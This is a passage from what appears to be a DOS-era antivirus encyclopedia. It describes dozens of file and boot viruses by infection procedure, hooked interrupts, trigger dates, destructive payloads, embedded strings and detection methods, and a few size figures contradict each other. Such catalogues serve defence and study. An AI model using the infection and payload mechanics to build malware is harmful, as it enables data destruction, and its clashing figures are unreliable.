  28646.  "Cannot uninstall xray, it has not been installed."
  28647.  "???????????"
  28648.  
  28649. [Mange-Tout.1099]
  28650. Virus Type: File Type (EXE files)
  28651. Virus Length:
  28652. Virus Memory Type: High Memory Resident
  28653. Place of Origin:
  28654.  
  28655. PC Vectors Hooked: INT 08h, INT 09h, INT 21h
  28656.  
  28657. Infection Procedure:
  28658. 1) Copies its code to address 0054:0000.
  28659. 2) Does a series of ins and outs at port 21h.
  28660. 3) Hooks INT 8, 9, and 21.
  28661. 4) Checks the carrier file if it is an EXE file. If it is, the virus
  28662.    infects it by transferring the first 198 bytes of the original code
  28663.    at the end of the file and transfering the virus code at the
  28664.    beginning.
  28665.  
  28666. [TP39VIR]
  28667. Other Name: Yank-39
  28668. Virus Type: File Virus
  28669. Virus Length: Approximately 2768 bytes
  28670. Virus Memory Type:
  28671. Trigger: Triggers if time is 5:00 pm of any day.
  28672.          Plays part of the song: "Jack and Jill"
  28673. Run Directly: Loads virus code to high memory
  28674.  
  28675. PC Vectors Hooked: Int 21
  28676.  
  28677. Infection Procedure:
  28678. 1) Loads itself to high memory, allocating 2896 bytes.
  28679. 2) Moves 2768 bytes onto the memory.
  28680. 3) Infects *.COM and *.EXE files. Copies the virus code to the
  28681.    host program. Loads the virus first before running the host
  28682.    program.
  28683.  
  28684. [Xpeh.4928]
  28685. Other Name: Yankxpeh
  28686. Virus Type: File Virus
  28687. Virus Length: Approximately 4768 bytes
  28688. Place of Origin:
  28689. Run Directly: Loads virus code to high memory
  28690.  
  28691. PC Vectors Hooked: Int 21
  28692.  
  28693. Infection Procedure:
  28694. 1) Loads itself to high memory, allocating 4944 bytes.
  28695. 2) Moves 4768 bytes onto the memory.
  28696. 3) Infects *.COM and *.EXE files. Copies the virus code to the
  28697.    host program. Loads the virus first before running the host
  28698.    program.
  28699.  
  28700. [Tanpro.5241]
  28701. Virus Name: Tanpro
  28702. Virus Type: File Virus
  28703. Virus Length: Approximately 524 bytes
  28704. Virus Memory Type: High Memory
  28705. Place of Origin:
  28706.  
  28707. PC Vectors Hooked: Int 21, Int 27
  28708.  
  28709. Infection Procedure:
  28710. Uses TSR, Int 27. Allocates 3104 bytes (using MEM) of the memory.
  28711. Creates a hidden un-named file within the root directory with a size
  28712. of 10000 bytes. Within the code is the string "This file is
  28713. infected..." Executes this program, deletes it afterwards then calls
  28714. Int 27, to retain its possession of the memory for further infection
  28715. of other files. Infects *.COM and *.EXE files. Copies the virus code
  28716. to the host program, adding approximately 524 bytes. Loads the virus
  28717. first before running the host program.
  28718.  
  28719. The virus, while memory resident, infects any executed *.COM and
  28720. *.EXE files. It does not do anything special. It just replicates when
  28721. it is memory resident. Infects file only if it is executed.
  28722.  
  28723. Damage:
  28724. 1) Free memory decreases by approximately 3104 bytes.
  28725. 2) Increases file size by approximately 524 bytes.
  28726.  
  28727. Symptom:
  28728. 1) Delay in program execution due to virus activity.
  28729. 2) Text string: "(c) tanpro'94" appears within the virus code.
  28730.  
  28731. Detection method: Locate mentioned text string.
  28732.  
  28733. [Manzon]
  28734. Virus Type: File Virus, Soft Mice
  28735. Virus Length: 1712 Bytes
  28736. Virus Infect Type: COM files
  28737. Virus Memory Type: High Memory Resident
  28738. Place of Origin:
  28739.  
  28740. PC Vectors Hooked:  INT 21h
  28741.  
  28742. Infection Procedure:
  28743. 1) Decrypts 1417 bytes of its code and then allocates 1728 bytes
  28744.    in HMA.
  28745. 2) Transfers its code to HMA with a size of 1712 bytes.
  28746. 3) Hooks INT 21.
  28747. 4) Returns control to the original routine.
  28748.  
  28749. The virus code has text strings of programs and dos utilities which the
  28750. virus uses to compare with the target file. This method makes detection
  28751. more difficult.
  28752.  
  28753. [Kaos4.A]
  28754. Virus Type: File Virus
  28755. Virus Length:
  28756. Place of Origin:
  28757. Virus Memory Type: Non Resident
  28758.  
  28759. PC Vectors Hooked :
  28760.  
  28761. Infection Procedure:
  28762. 1) Sets the disk transfer area, 114C:0816h.
  28763. 2) Tries to infect COM and EXE files in the same directory and
  28764.    other directories specified in PATH. It uses the Find First
  28765.    Match Directory Entry, there it infects all EXE and COM files.
  28766.    Then the Next Directory Entry, there it also infects all
  28767.    EXE and COM files.
  28768. 3) Sets DTA again, 114C:0080h.
  28769. 4) Displays the message stored in the virus code.
  28770.  
  28771. [Sarampo.B]
  28772. Virus Type: File Virus (COM and EXE files)
  28773. Eff Length : 1371 bytes
  28774.  
  28775. Symptoms :
  28776. Increase in size of infected COM and EXE files by 1371 bytes
  28777. and decrease in available memory by 1664 bytes.  Executing programs
  28778. may slow down due to the infection procedure of the virus.
  28779.  
  28780. General Comments:
  28781. During the first infection, the virus allocates 1664 bytes in the
  28782. memory and transfers its code to HMA.  It also hooks INT 21 and INT 24.
  28783. Then rebuilds the carrier program while it is memory resident so it can
  28784. return control to the original routine.
  28785.  
  28786. This virus infects all opened, executed and copied COM and EXE
  28787. files. It also changes the file's time to 1:13pm.
  28788.  
  28789. SARAMPO displays some garbage on the screen if the system date
  28790. is April 25, December 25 or October 12, and the virus is already
  28791. resident for about 2 minutes.
  28792.  
  28793. This text is found in the virus code:
  28794.  
  28795.       "Do you like this Screen Saver ? I hope so."
  28796.       "Created by Sarampo virus"
  28797.  
  28798. [Hare.7610]
  28799. Virus Type: File Virus
  28800. Virus Length:
  28801. Virus Infect Type: COM and EXE files and
  28802.                    Master Boot Record
  28803. Place of Origin:
  28804. Virus Memory Type: High Memory
  28805.  
  28806. PC Vectors Hooked: Int 21h
  28807.  
  28808. Infection Procedure:
  28809. 1) NOTs the data in CS:[DI] or 115C:2822 with a CX value of ED5h.
  28810.    Then another encryption starting at 115C:29B2 with a CX value of
  28811.    E0Eh,
  28812. 2) XORs AX with an initial value of 2726.
  28813. 3) Increments AH and AL by 2h.
  28814. 4) Gets the memory size service with a return value of AX=280h.
  28815. 5) Gets the dos variable and loads it to the high memory from 115C:2810
  28816.    to 9DDE:0 with a size of 1DBAh. A message can be found there which
  28817.    reads: "HDEuthanasia by Demon Emperor: Hare Krsua, hare, hare"
  28818. 6) Hooks Int 21h and sets it. From there it infects the master boot
  28819.    record.
  28820.  
  28821. [Hare.7750]
  28822. Virus Type: File Virus
  28823. Virus Length:
  28824. Virus Infect Type: COM and EXE files and
  28825.                    Master Boot Record
  28826. Place of Origin:
  28827. Virus Memory Type: High Memory
  28828.  
  28829. PC Vectors Hooked: Int 21h
  28830.  
  28831. Infection Procedure:
  28832. 1) Encrypts data, address 115C:[2824], 3866 times by using the NOT
  28833.    operand. Another loop in 115C:[29B2], 3667 times by XORing
  28834.    to AX. AH and AL are incremented by 2h, thus producing:
  28835.    "INFECTUM.COM.HOSTA.COMCOM.COMMAND\SYSTEM\IOSUBSYS\HSFLOP.PDR"
  28836. 2) Gets the memory size, 640 bytes.
  28837. 3) Gets the dos variable.
  28838. 4) Loads the code to the high memory, from 115C:2810 to 9DD5:0000
  28839.    (7750 bytes).
  28840. 5) Returns the disk drive parameters to read the hard disk.
  28841.    Reads disk sectors, 1 sector to be transferred to address
  28842.    9DD5:2096, track no. 108, sector no. 1, head no. 125.
  28843. 6) Executes the following codes:
  28844.  
  28845.            XOR AL,AL
  28846.            OUT 43,AL
  28847.            JMP 94C
  28848.            IN  AL,40
  28849.            MOV AH,AL
  28850.            IN  AL,40
  28851.            XOR AL,AH
  28852.            XCHG AL,AH
  28853.  
  28854. The virus first infects the MBR, from there it waits for COM
  28855. and EXE files to infect.
  28856.  
  28857. Damage: When rebooting, the computer reboots repeatedly.
  28858.  
  28859. [Markt]
  28860. Virus Type: File Virus, Soft Mice
  28861. Other Name: WERBE
  28862. Virus Length: 1533 bytes
  28863. Original Name: WERBE
  28864. Place of Origin: Germany
  28865.  
  28866. PC Vectors Hooked:
  28867.  
  28868. Infection Procedure:
  28869. 1) Decrypts 1412 bytes of its virus code.
  28870. 2) Gets the DTA address and then sets it.
  28871. 3) Checks the current drive and then overwrites the boot sector
  28872.    of the hard disk.
  28873.  
  28874. Damage:
  28875. Upon loading the virus it overwrites all the boot sectors
  28876. of all fixed drives, thus destroying them.
  28877.  
  28878. This message can be found in the virus code:
  28879.  
  28880.     "Ups, all Disks from"
  28881.     "C: to Z: Trashed!"
  28882.     "Sorry about that!"
  28883.     "to all Military Inventors its time to give us the Tachyonator!"
  28884.  
  28885.     "MediaMarkt WerbeVirus '94 (c)"
  28886.     "MediaMarkt Germany The Wizard"
  28887.  
  28888. Note: After destroying the hard disk the virus executes the
  28889. following code:
  28890.  
  28891.        17AC:0575  JMP 0575
  28892.  
  28893. This code performs an endless loop.
  28894.  
  28895. [Leon.1217]
  28896. Virus Type: Polymorphic, File Virus (EXE files)
  28897. Virus Length: 1,224-1,253 bytes
  28898. Virus Memory Type: Non-memory resident
  28899. Place of Origin:
  28900.  
  28901. PC Vectors Hooked: INT 24h
  28902.  
  28903. Infection Procedure:
  28904. The virus only infects .EXE files. It increases an infected file's
  28905. size by 1,224-1,253 bytes. The virus infects the host file by attaching
  28906. itself at the end of the file. As a polymorphic virus, it first
  28907. decrypts its program using XOR 1410H to each encrypted word. Then it
  28908. hooks INT 24H to disable the disk write error display when it is
  28909. infecting its host file. Then it checks the current disk directory and
  28910. searches for EXE files. After finding a file it changes its attribute
  28911. to archive. Then it checks for the current time. If it is between the
  28912. 7th-60th minute of an hour, and between the 30th-60th second of a
  28913. minute, the virus closes the file and does not infect. Any time beyond
  28914. that, the virus infects every EXE file in all the subdirectories of
  28915. the current drive. The virus is not memory resident. It only activates
  28916. upon loading and executing an infected file. It will be obvious when
  28917. the virus infects .EXE files in the current drive for it takes a long
  28918. time, depending on the number of .EXE files in the current drive, to
  28919. load a file.
  28920.  
  28921. Damage: It slows down the loading of executable files.
  28922.  
  28923. Symptom:
  28924. 1) Infected files increase by 1,224-1,253 bytes.
  28925. 2) Very slow loading of executable files.
  28926.  
  28927. [Karnavali.1972]
  28928. Virus Type: File Virus
  28929. Other Name:
  28930. Virus Length:
  28931. Place of Origin:
  28932.  
  28933. PC Vectors Hooked:
  28934.  
  28935. Infection Procedure:
  28936. 1) Gets the dos variables.
  28937. 2) Reads drive C:. Reads FFFFh sectors, with starting sector
  28938.    5945h and 139E:0889h memory address for data transfer.
  28939. 3) Tries to write 4 sectors to drive C:. After writing, EXE and COM
  28940.    files that are executed will not get infected.
  28941.  
  28942. After rebooting the system, the system will hang and the keyboard
  28943. will be disabled.
  28944.  
  28945. [Tecla]
  28946. Virus Name: BARR1303
  28947. Virus Type: Polymorphic, File Virus
  28948. Other Name: TECLA
  28949. Virus Length: 2051 bytes
  28950. Virus Infect Type: COM and EXE files
  28951. Trigger Condition: September 23
  28952. Virus Re-infect: No
  28953. Virus Memory Type: High Memory Resident
  28954. Place of Origin:
  28955.  
  28956. PC Vectors Hooked: INT 16h, INT 21h, INT 24h
  28957.  
  28958. Infection Procedure:
  28959. The virus is a polymorphic type and infects both .COM and .EXE files.
  28960. It adds 1303 bytes to an infected file. It first decrypts its code,
  28961. which is attached to the host, using SUB 75H to each byte. It can be
  28962. seen from the decrypted data area of the virus code string "SSta
  28963. Tecla(MAD1)" which gives another name to the virus. It copies its
  28964. program (1033 bytes) to the high memory, 9F9A:0100; thus, overlaps
  28965. the video adapter memory. Once resident in the memory it checks if
  28966. the date is September 23. If it is, it activates its payload by
  28967. hooking to INT 16H (change to vector 9F9A:017C) and changes the
  28968. keyboard ASCII table. It increments all the unextended keyboard input
  28969. by 1 ASCII character. Thus, a keyboard input of "A" will display "B",
  28970. or an input of "." will display "/", and so on. Without the trigger
  28971. date it still hooks to INT 21h by changing its vector to its program
  28972. in the high memory 9F9A:016C to infect every loading and executing
  28973. program. It also hooks to INT 24h and changes its vector to 9F9A:0107
  28974. which is seen to give no payload.
  28975.  
  28976. Damage: Changes unextended keyboard input to an increment of 1 ASCII
  28977. character.
  28978.  
  28979. [Barrotes.1310.A]
  28980. Virus Name: BARR1310
  28981. Virus Type: File Virus
  28982. Other Name:
  28983. Virus Length: 1310 bytes
  28984. Virus Infect Type: .COM and .EXE files
  28985. Trigger Condition: January 5
  28986. Virus Re-infect: No
  28987. Virus Memory Type: High Memory Resident
  28988. Place of Origin:
  28989.  
  28990. PC Vectors Hooked: INT 1Ch, INT 21h
  28991.  
  28992. Infection Procedure:
  28993. The virus is a file type virus that infects both .COM and .EXE files.
  28994. It adds 1303 bytes to an infected file. It copies its program to the
  28995. high memory at 9F9C:0100; thus, overlapping with the video adapter
  28996. memory. It hooks to INT 21H by changing its vector to point to its
  28997. program at 9F9C:017B. This will allow the virus to infect loading
  28998. and executing files. Once it becomes resident in the memory it checks
  28999. the date. If it is January 5, it will change the interrupt vector of
  29000. INT 1CH to point to its program in the high memory at 9F9C:049F. Then
  29001. it overwrites the MBR of drive C; thus, destroying its partition. Since
  29002. INT 1CH is a clock tick interrupt, the program it is pointing to is
  29003. executed 18.2 times per second. The program at this interrupt displays:
  29004. "Virus BARROTES pro OSoft" on a blue background, and four vertical,
  29005. flickering bars across the screen. At this point, the machine can still
  29006. be used if the user can tolerate the eye straining bars.
  29007.  
  29008. Damage:
  29009. 1) Destroys drive C's MBR and partition table.
  29010. 2) Corrupts the video display.
  29011.  
  29012. [Cascade]
  29013. Virus Name: CAS1701A
  29014. Virus Type:  Polymorphic, File Virus
  29015. Other Name:
  29016. Variant: CASCADE.1704
  29017. Virus Length: 1,701 bytes
  29018. Virus Infect Type: .COM files
  29019. Virus Re-infect: no
  29020. Virus Memory Type: Memory resident, MCB type
  29021. Place of Origin:
  29022.  
  29023. PC Vectors Hooked: INT 21h
  29024.  
  29025. Infection Procedure:
  29026. The virus only infects .COM files. It increases an infected file's size
  29027. by 1,701 bytes. The virus infects the host file by attaching itself at
  29028. the end of the file.
  29029.  
  29030. It is memory resident and can be activated upon loading and executing
  29031. an infected .COM file. As a polymorphic virus, it first decrypts its
  29032. code. Then the virus copies its 1701 bytes program in the low memory,
  29033. after the DOS resident programs. Then it hooks to INT 21H by changing
  29034. its vector to point to its program at 17F8:031C. It uses the
  29035. interrupt's service 4BH to attach itself to the host file. After
  29036. attaching itself to the host, it encrypts its main program and writes
  29037. the new file to the disk. It was seen that the virus checks the current
  29038. year before it infects the host file, and the trigger year is 1988.
  29039. Matching this year, which will not happen unless there's something
  29040. wrong with the system clock, there is no payload seen.
  29041.  
  29042. The virus occupies 1,984 bytes in the memory when checked using DOS
  29043. CHKDSK.
  29044.  
  29045. Symptom:
  29046. 1) Infected files increase by 1,701 bytes.
  29047. 2) Decreases the memory by 1,984 bytes.
  29048.  
  29049. [Natas-1]
  29050. Alias: Never-1
  29051. Origin:
  29052. Eff Length: 1788 bytes
  29053. Virus Type: File Virus; Encryption Virus; .COM files only
  29054.  
  29055. Symptoms :
  29056. Infected files increase by 4744 bytes, decrease in available
  29057. memory by 6144 bytes. Program execution slows down.
  29058.  
  29059. General Comments:
  29060. The virus first decrypts 2300 bytes of its code and then
  29061. allocates 6144 bytes into the High Memory Area. It will then copy a
  29062. part of its code to the area where INT 1 Vector is pointing to thus
  29063. replacing it.  Then it will move 5111 bytes to the High Memory
  29064. Area. It will then hook INT 10, 13, 15 and 21.
  29065.  
  29066. Further analysis of the virus was not possible because it has replaced
  29067. the code for INT 1 which is the Single Step Interrupt which is used
  29068. by debuggers like DEBUG and S-ICE.  NATA4744 will format a track
  29069. on the hard disk every time INT 1 is used, and it will continue to do
  29070. so until all local fixed drives are formatted.
  29071.  
  29072. This message is found in the virus code:
  29073.  
  29074.     "Time has come to pay (c) 1994 NEVER-1"
  29075.  
  29076. [S_Bug.A]
  29077. Virus Type: Polymorphic Virus
  29078. Eff Length: 3500-5500 bytes
  29079. Virus Status:
  29080.  
  29081. Symptoms :
  29082. Increase in the size of infected COM and EXE files by 3500-5500
  29083. bytes and decrease in available memory by 10272 bytes.  Executing
  29084. programs may slow down due to the infection procedure of the virus.
  29085.  
  29086. General Comments:
  29087. This virus is a very complex and highly polymorphic virus.  It will
  29088. first decrypt 3504 bytes of its virus code and then allocate 10 kbytes
  29089. of memory.  It will then be resident in the High Memory Area.  It will
  29090. also hook INT 21h with infection triggers with services 3D, 4B and 6C.
  29091.  
  29092. Files infected by the virus are more likely to have file sizes as this
  29093. virus randomly assigns codes for decryption of the real virus code
  29094. which is 3504 bytes.  File sizes may be from 3500 bytes to 5500 bytes.
  29095. All COM and EXE files that are opened, executed or copied will be
  29096. infected if the following condition is satisfied COMSPEC=COMMAND.COM.
  29097. This condition is also the trigger of the virus if it is resident or
  29098. not.
  29099.  
  29100. This message is found in the virus code:
  29101.  
  29102.      "Satan Bug Virus - Little Loc"
  29103.  
  29104. [Smeg.Pathogen]
  29105. Alias: SMEG v0.1
  29106. Origin : United Kingdom
  29107. Eff Length : 4432-4447 bytes
  29108. Virus Type:
  29109.  
  29110. Symptoms :
  29111. Increase in file size of EXE and COM programs with a size of
  29112. 4432-4447 bytes and decrease of 7872 in available memory.
  29113.  
  29114. General Comments:
  29115. On the first infection, this virus will first allocate 7872 bytes in
  29116. the High Memory Area and then transfer 3700 bytes of its code to that
  29117. area.  It will then hook INT 21, INT 13, INT 20 and will make
  29118. INT 3 as INT 21.
  29119.  
  29120. Pathogen is very complex and it is a polymorphic type of virus.
  29121. This virus will infect COM and EXE files that are opened, executed
  29122. and copied.  It will also display a "Memory allocation Error" when
  29123. an infected file attempts to be memory resident.
  29124.  
  29125. The danger Pathogen brings is that when the system date is Monday and
  29126. the time is 5:00 - 5:59 PM it writes zeroes onto the sectors of
  29127. the hard disk randomly, thus destroying some, if not all, of the data
  29128. in the drive. It will also trash or reset the BIOS of the computer.
  29129.  
  29130. The virus displays the following messages on the screen:
  29131.  
  29132.  "Your hard-disk is being corrupted, courtesy of PATHOGEN!"
  29133.  "Programmed in the U.K. (Yes, NOT Bulgaria) (c) The Black Baron 1993-4"
  29134.  "Featuring SMEG v0.1 : Simulated Metamorphic Encryption Generator"
  29135.  " 'Smoke me a kipper, I'll be back for breakfast.....!"
  29136.  "Unfortunately some of your data won`t!!!!!"
  29137.  
  29138. [Cawber]
  29139. Virus Type: Polymorphic
  29140. Virus Length: 2010 bytes
  29141. Virus Memory Type: Non-memory resident
  29142. Place of Origin:
  29143.  
  29144. PC Vectors Hooked:
  29145.  
  29146. Infection Procedure:
  29147. The virus is a polymorphic type that first decrypts its decryptor using
  29148. 63 bytes of data in its viral code. Each byte, as stored in the AX
  29149. register, is decrypted using SHL AX,1 and is added to the BP register.
  29150. The final result stored in BP after 63 decryptions will be the
  29151. decryptor. The virus then decrypts its 2,010 bytes code using XOR AX,
  29152. BP, where AX contains a word of the encrypted virus code. How it
  29153. allocates memory to make itself memory resident was not seen and its
  29154. hook to any interrupts. There is also no infection trigger.
  29155.  
  29156. [Sayha]
  29157. Virus Type: File Virus
  29158. Virus Length:
  29159. Virus Re-infect: Does not reinfect
  29160. Virus Memory Type: High Memory
  29161. Place of Origin:
  29162.  
  29163. PC Vectors Hooked: Int 21h
  29164.  
  29165. Infection Procedure:
  29166. 1) Loads itself to high memory, loading approximately 9040 bytes.
  29167. 2) Infects *.COM and *.EXE files by attaching itself to the host
  29168.    program.
  29169. 3) Moves the virus code by batches, copying its code 2 bytes at a time
  29170.    in different locations.
  29171.  
  29172. Damage:
  29173. 1) Increases file size.
  29174. 2) Occupies space in HMA.
  29175.  
  29176. Symptom: Delay in program execution.
  29177.  
  29178. [SCITZO]
  29179. Virus Type: File Virus
  29180. Virus Length: Approximately 1329 bytes
  29181. Virus Memory Type: High Memory
  29182. Place of Origin:
  29183.  
  29184. PC Vectors Hooked: Int 21h
  29185.  
  29186. Infection Procedure:
  29187. 1) Loads itself to high memory, allocating 1360 bytes (using MEM).
  29188. 2) Moves 1329 (0531H) bytes to high memory.
  29189. 3) Infects *.COM and *.EXE files. Copies the virus code to the host
  29190.    program, adding approximately 1329 bytes. Loads the virus first
  29191.    before running the host program.
  29192.  
  29193. The virus when resident in memory, will infect any executed *.COM and
  29194. *.EXE files. It does not do anything special. It just replicates when
  29195. it is memory resident. Infects only executed files.
  29196.  
  29197. Damage:
  29198. 1) Free memory decreases.
  29199. 2) Infected files increase in length.
  29200. 3) Adds approximately 1329 bytes.
  29201.  
  29202. Symptom: Delay in program execution due to virus activity.
  29203.  
  29204. Detection method: Locate the virus text strings.
  29205.  
  29206. [Necros]
  29207. Origin: Tralee, Co. Kerry, Ireland
  29208. Eff Length: 1164 bytes
  29209. Virus Type: File Virus; Encryption Virus; .COM files
  29210.  
  29211. Symptoms :
  29212. It will increase com files by 1164 bytes, decrease in available
  29213. memory by 2624 bytes.  Execution of running programs slows down.
  29214. A write-protect error appears when a program is opened and the disk
  29215. is write protected.
  29216.  
  29217. General Comments:
  29218. This virus will first decrypt its code with a size of 1142 bytes and
  29219. then will hook INT 3, INT 21 and INT 1C.  Then it will allocate 2624
  29220. bytes in the memory. This virus will be MCB resident after executing
  29221. the carrier program because it will execute a TSR command.
  29222.  
  29223. It will immediately infect .COM files that are executed.  When .EXE
  29224. files are run, Necros will create a hidden .COM file of the same name
  29225. and will increase the file size to 1164 bytes.
  29226.  
  29227. The Necros virus will check if the system date is November 21.  If
  29228. this condition is satisfied then it will start to produce a countdown-
  29229. like sound 2 minutes after the virus has been loaded.  This will go
  29230. on for 15 seconds before this message is displayed on the screen:
  29231.  
  29232.       "Virus V2.0 (c) 1991 Necros the Hacker."
  29233.       "Written on 29,30 June in Tralee, Co. Kerry, Ireland"
  29234.       "Happy Birthday, Necros!"
  29235.  
  29236. [Helloween.1376]
  29237. Virus Type: File Virus
  29238. Other Name:
  29239. Virus Length:
  29240. Virus Infect Type: EXE and COM files
  29241. Trigger Condition: November 1
  29242. Place of Origin:
  29243. Virus Memory Type: High Memory Type
  29244.  
  29245. PC Vectors Hooked: Int 21h
  29246.  
  29247. Infection Procedure:
  29248. 1) Loads itself into the high memory immediately copying from
  29249.    address 1155:0129h to 9F89:0000h, copying 1376 bytes.
  29250. 2) Hooks INT 21h.
  29251. 3) Gets the Real-Time Clock date, and returned values are in BCD.
  29252. 4) Checks whether the date is November 1. If yes, it clears the screen,
  29253.    background color is red and this message appears in the
  29254.    middle of the screen:
  29255.  
  29256.    "Nesedte porad u pocitace a zkuste jednou delat neco
  29257.      rozumneho!"
  29258.    "**************"
  29259.    "!! Poslouchjte HELLOWEEN - nejlepsi metalovou skupinu !!"
  29260.  
  29261.    Then by pressing any key, the machine will reboot. Making
  29262.    no infection.
  29263.  
  29264.    But if the date is not November 1, the COM and/or EXE
  29265.    files that are executed will get infected.
  29266.  
  29267. Detection method : Infected files increase up to 1376 bytes.
  29268.  
  29269. [Delta.1163]
  29270. Virus Type:  Polymorphic, File Virus
  29271. Other Name:
  29272. Virus Length: 1163 bytes
  29273. Original Name: DELTA
  29274. Virus Infect Type: .COM and .EXE files
  29275. Trigger Condition: November 4
  29276. Virus Re-infect: no
  29277. Discovery Date: February 1996
  29278. Virus Memory Type: High memory resident
  29279. Place of Origin: Brazil
  29280.  
  29281. PC Vectors Hooked: INT 21H
  29282.  
  29283. Infection Procedure:
  29284. As a polymorphic virus it first decrypts its main program using XOR C0H
  29285. to each byte. It infects its host by attaching itself at the end of the
  29286. file. It adds 1,163 bytes to an infected file. Then it copies its
  29287. program in the high memory at 9F69:0000 and jumps there. It hooks INT
  29288. 21H by pointing its vectors to 9F69:01C5. The virus can become memory
  29289. resident upon loading and executing an infected file.
  29290.  
  29291. Being memory resident it can attach itself to an executable file when
  29292. the file uses service 4BH of the hooked INT 21H. During infection the
  29293. virus checks if the current month is November and the current day is
  29294. 4. At this time the virus resets the drive C:\ BIOS configuration and
  29295. changes the boot sequence to search drive C:\ first upon bootup. Then
  29296. waits for 30 sec. before making a warm boot. The following messages
  29297. appear:
  29298.  
  29299.         "Good bytes from (DEL)ta Virus!!!"
  29300.         "      Reset in 30 seconds.      "
  29301.  
  29302. After which, the hard disk will be disabled, as if it already has a
  29303. corrupted partition table. Upon infecting an executable file it makes
  29304. its second infection to COMMAND.COM in drive A:\; thus, corrupting it
  29305. and disabling proper bootup. The effect of the payload can be easily
  29306. solved by reconfiguring the hard disk in the BIOS and replacing the
  29307. infected COMMAND.COM with a new one since the virus doesn't write to
  29308. the MBR. Other text strings can be seen inside the virus code beside
  29309. the one displayed upon execution of the payload which is:
  29310.  
  29311.         "Brazil - 02/96"
  29312.  
  29313. Damage:
  29314. 1) Resets the hard disk BIOS configuration.
  29315. 2) Corrupts COMMAND.COM.
  29316.  
  29317. Symptom: Infected files increase by 1163 bytes.
  29318.  
  29319. [Delwin.1759]
  29320. Virus Type:  Polymorphic, Boot/File Virus
  29321. Virus Length: 2048 bytes
  29322. Virus Infect Type: .COM and .EXE files
  29323. Virus Re-infect: no
  29324. Discovery Date:
  29325. Virus Memory Type: High memory resident
  29326. Place of Origin:
  29327.  
  29328. PC Vectors Hooked: INT 13h, INT 21h, INT 1Ch
  29329.  
  29330. Infection Procedure:
  29331.  
  29332. Infecting the Master Boot Sector:
  29333. The virus primarily infects the Master Boot Sector of drive C:\. As
  29334. a polymorphic virus it first decrypts 1,714 bytes of its code using XOR
  29335. 9B. Then it reads the boot sector of drive C:\ in its program. It saves
  29336. a copy of this sector to head 0, cylinder 0, sector 2 of drive C:\.
  29337. Then in makes a byte output twice to port 70H whose purpose is unknown
  29338. due to the unavailability of hardware port reference. The virus makes a
  29339. copy of its program, occupying 4 sectors, to head 0, cylinder 0, sector
  29340. 3 of drive C:\. Then the virus modifies the first 46 bytes of the boot
  29341. sector copied in its program and writes it back to the boot sector of
  29342. drive C:\
  29343.  
  29344. Infecting Executable Files:
  29345. Once the virus has infected the boot sector of drive C:\ it becomes
  29346. memory resident upon system bootup. Upon bootup it first allocates space
  29347. in the high memory starting at 9E70:0000. Then it reads its program,
  29348. which occupies 4 sectors, from the infected drive C:\ starting from
  29349. sector 3, cylinder 0, head 0 to its allocated space in the high memory
  29350. (9E70:0100). From there it hooks to INT 13H and INT 21H to point to its
  29351. program in the high memory which will enable the virus to attach itself
  29352. to any loading and executing .COM or .EXE file. Then after hooking to
  29353. the interrupts it retrieves the original boot sector from head 0,
  29354. cylinder 0, sector 2 of drive C:\ to resume normal bootup. At this point
  29355. the virus is already memory resident and can infect executable files
  29356. when loaded, executed and copied. It first searches for COMMAND.COM to
  29357. infect.
  29358.  
  29359. The virus infects the file by attaching  itself at the end of the host
  29360. file. However, its attachment most of the time is not complete and
  29361. sometimes just corrupts the program so the size added to the infected
  29362. file is not definite. No trigger or payload exists.
  29363.  
  29364. Damage: Corrupts executable files.
  29365.  
  29366. Symptom: Slows down file loading and execution time.
  29367.  
  29368. [Lemming.2160]
  29369. Virus Type: File Virus
  29370. Place of Origin:
  29371. Virus Memory Type: Non resident type
  29372.  
  29373. PC Vectors Hooked: Int 21
  29374.  
  29375. Infection Procedure:
  29376. 1) Encrypts data from 114C:[SI+BP],XOR to 49h producing a message
  29377.    that reads:
  29378.  
  29379.             "TBDRV   SP"
  29380.             "The Rise and Fall of ThunderByte-1994-Australia"
  29381.             "You will Never Trust Anti-Virus Software Again!!"
  29382.             "[LEMMING] ver .99"
  29383.             "TBAVTBSCANNAVVSAFEFPROT"
  29384.             "COMcomEXEexe"
  29385.  
  29386. 2) Gets the dos variable and points to "[LEMMING] ver .99."
  29387.  
  29388. While the virus is memory resident, a write-protect error will
  29389. appear if the user tries to execute an EXE or COM file with a
  29390. write-protected disk.
  29391.  
  29392. [Wulf.1500-1]
  29393. Other Name: Wulf
  29394. Virus Type: File Virus
  29395. Virus Length: Approximately 1500 bytes
  29396. Virus Memory Type: High Memory
  29397. Place of Origin:
  29398.  
  29399. PC Vectors Hooked: Int 13h, Int 21h
  29400.  
  29401. Infection Procedure:
  29402. 1) Loads itself to high memory after decryption, allocating 2976 bytes
  29403.    (9F46:0000).
  29404. 2) Moves 1500 (05CCH + 0010H) bytes onto the high memory.
  29405. 3) Infects *.EXE files. Copies the virus code to the host program,
  29406.    adding approximately 1500 bytes. Loads the virus first before
  29407.    running the host program.
  29408. 4) While memory resident, the virus infects all executed EXE files.
  29409.  
  29410. The virus reacts ordinarily by allocating space in the memory before
  29411. infecting files. Nothing extraordinary happens. It just attaches its
  29412. code to the host program after it is loaded from the memory.
  29413.  
  29414. Damage:
  29415. 1) Decrease in free memory.
  29416. 2) Increase in file size.
  29417.  
  29418. Symptom: May display
  29419.  
  29420.     "TBMEMXXXTBCHKXXXTBDSKXXXTBFILXXXPSQRW"
  29421.     "[WULF] (c) 1995-96 Werewolf"
  29422.     "CLEAN.AVP.TB.V.SCAN.NAV.IBM.FINDV.GUARD.FV.CHKDSK"
  29423.  
  29424. which appears in the virus code.
  29425.  
  29426. Detection method: Decrypt the virus code, then look for the above
  29427. strings.
  29428.  
  29429. [Teraz.2717]
  29430. Virus Type: File Virus
  29431. Virus Length: Approximately 2717 bytes
  29432. Virus Re-infect: Does not re-infect, infected file size is consistent
  29433. Virus Memory Type: Non Resident
  29434. Place of Origin:
  29435.  
  29436. PC Vectors Hooked: Int 21h
  29437.  
  29438. Infection Procedure:
  29439. Directly infects *.COM and *.EXE files. Copies the virus code to the
  29440. host program, adding approximately 2717 bytes. Loads first the virus
  29441. before running the host program.
  29442.  
  29443. The virus, when executed, infects any executed *.COM and *.EXE files.
  29444. It does not do anything special. It just replicates when it
  29445. is resident in the memory. Only infects executed files.
  29446.  
  29447. Damage:
  29448. 1) Increase in file size.
  29449. 2) Adds approximately 2717 bytes.
  29450.  
  29451. Symptom:
  29452. Delay in program execution due to virus activity.
  29453.  
  29454. [N-Xeram]
  29455. Other Name: Xeram
  29456. Virus Type: File Virus
  29457. Virus Length: Approximately 1667-1678 bytes
  29458. Virus Re-infect: Does not re-infect, infected file size is consistent.
